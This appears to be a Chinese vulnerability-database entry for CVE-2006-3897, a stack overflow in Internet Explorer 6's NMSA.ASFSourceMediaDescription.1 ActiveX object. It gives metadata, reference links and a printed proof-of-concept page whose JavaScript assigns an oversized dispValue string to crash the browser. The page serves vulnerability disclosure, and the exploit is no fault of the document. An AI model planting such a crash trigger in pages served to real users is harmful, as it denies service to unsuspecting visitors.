Microsoft Internet Explorer NMSA.ASFSourceMediaDescription.1 ActiveX 对象堆栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110672 漏洞类型 缓冲区溢出
发布时间 2006-07-24 更新时间 2006-07-31
CVE编号 CVE-2006-3897 CNNVD-ID CNNVD-200607-477
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/28259
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-477
|漏洞详情
Windows2000上的MicrosoftInternetExplorer6存在堆栈溢出漏洞。远程攻击者可以通过创建一个带有长dispValue属性的NMSA.ASFSourceMediaDescription.1ActiveX对象,引起拒绝服务(应用程序崩溃)。
|漏洞EXP
source: http://www.securityfocus.com/bid/19114/info

Microsoft Internet Explorer is prone to a stack-overflow vulnerability.

This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script>

function Demo() {
	var a = new ActiveXObject('NMSA.ASFSourceMediaDescription.1');
	var b = 'XXXX';
	while (b.length <= 1024) b += b;
	a.dispValue = b;	
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


</body></html>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>
|参考资料

来源:XF
名称:ie-asfsourcemediadescription-dispvalue-dos(27930)
链接:http://xforce.iss.net/xforce/xfdb/27930
来源:BID
名称:19114
链接:http://www.securityfocus.com/bid/19114
来源:OSVDB
名称:27232
链接:http://www.osvdb.org/27232
来源:VUPEN
名称:ADV-2006-2953
链接:http://www.frsirt.com/english/advisories/2006/2953
来源:MISC
链接:http://browserfun.blogspot.com/2006/07/mobb-23-nmsaasfsourcemediadescription.html